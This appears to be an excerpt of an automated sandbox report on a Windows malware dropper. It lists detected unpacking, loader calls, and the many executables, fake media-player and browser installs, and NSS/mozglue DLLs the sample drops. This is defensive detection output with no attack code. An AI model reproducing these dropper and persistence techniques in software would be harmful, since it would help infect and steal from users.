      Source: C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe Unpacked PE file: 19.2.KyTQCmNmjazMZrvIWzjrSsQG.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
      Detected unpacking (overwrites its own PE header)
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe Unpacked PE file: 4.2.9PWySv_SmMZ5POEp2PUJ_lbI.exe.400000.0.unpack
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe Unpacked PE file: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.400000.0.unpack
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe Unpacked PE file: 9.2.ulVElw2mPS2j3QKCM9gOxM3j.exe.400000.0.unpack
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe Unpacked PE file: 11.2.oO2a8x5RXTHKygCXkT7syx3J.exe.400000.0.unpack
      .NET source code contains potential unpacker
      Source: file9[1].exe.1.dr, RpgGameApp/RpgClass.cs .Net Code: ????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 8.2.awTgWtFfNpBsevxQFHzT446w.exe.430000.0.unpack, RpgGameApp/RpgClass.cs .Net Code: ????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 8.0.awTgWtFfNpBsevxQFHzT446w.exe.430000.0.unpack, RpgGameApp/RpgClass.cs .Net Code: ????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 12.0.gUlDp5No64Xfcgfbo3IlvG0y.exe.c90000.0.unpack, RpgGameApp/RpgClass.cs .Net Code: ????k???????q? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 12.2.gUlDp5No64Xfcgfbo3IlvG0y.exe.c90000.0.unpack, RpgGameApp/RpgClass.cs .Net Code: ????k???????q? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe Code function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
      Source: mozglue[1].dll.5.drStatic PE information: section name: .didat
      Source: mozglue[1].dll.11.drStatic PE information: section name: .didat
      Source: mozglue.dll.11.drStatic PE information: section name: .didat
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_0129DD7B push ecx; ret
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_0041C40C push cs; iretd
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_00423149 push eax; ret
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_0041C50E push cs; iretd
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_004231C8 push eax; ret
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_0040E21D push ecx; ret
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_0041C6BE push ebx; ret
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00468239 push ecx; ret
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0046E2B5 push ecx; ret

      Persistence and Installation Behavior:

      Drops PE files to the document folder of the user
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe File created: C:\Users\user\Documents\VlcpVideoV1.0.1\md8_8eus.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libflacsys_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libaiff_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\freebl3[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_flac_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libmjpeg_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\control\liboldrc_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\misc\liblogger_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe File created: C:\Program Files (x86)\Browzar\Browzar.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\spu\libmarq_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemuxdump_plugin.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\msvcp140[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsfsstorage_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\mozglue[1].dll
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe File created: C:\Program Files (x86)\Company\NewProduct\file4.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\softokn3[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\data_load.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\control\libhotkeys_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\d3d11\libdirect3d11_filters_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libsmf_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\libvlccore.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\librtp_plugin.dll
      Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exe File created: C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libau_plugin.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe File created: C:\ProgramData\vcruntime140.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\misc\libexport_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\vcruntime140[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libsdp_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\file2[1].exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libudp_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libdirectsound_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_imem_plugin.dll
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe File created: C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_hotkeys_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libtdummy_plugin.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe File created: C:\ProgramData\mozglue.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libxa_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\misc\libvod_rtsp_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libpva_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BrowzarBrowser_j11[1].exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_concat_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe File created: C:\Program Files (x86)\Company\NewProduct\Uninstall.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\jooyu[1].exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\Setup2[1].exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_h264_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_a52_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\file9[1].exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\libvlc.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libasf_plugin.dll
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe File created: C:\Program Files (x86)\Company\NewProduct\jooyu.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsc_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\file8[1].exe
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe File created: C:\ProgramData\freebl3.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libvcd_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libvc1_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_cdg_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsv_plugin.dll
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe File created: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\yzhang[1].exe
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mozglue[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libsubtitle_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Users\user\AppData\Local\Temp\nsl5825.tmp\nsExec.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libvdr_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\libssp-0.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libattachment_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll
      Source: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe File created: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\librawvid_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libtcp_plugin.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\freebl3[1].dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\file5[1].exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libimage_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\file3[1].bmp
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\file7[1].exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\toolspab2[1].exe
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe File created: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwasapi_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\SunLabsPlayer[1].exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mlp_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\spu\librss_plugin.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe File created: C:\ProgramData\nss3.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\connection.dll
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe File created: C:\Program Files (x86)\Browzar\Uninstall.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\misc\libfingerprinter_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\logger\libconsole_logger_plugin.dll
      Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exe File created: C:\Users\user\AppData\Local\Temp\install.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_dummy_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_copy_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\file1[1].exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\control\libdummy_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\spu\liblogo_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe File created: C:\ProgramData\msvcp140.dll
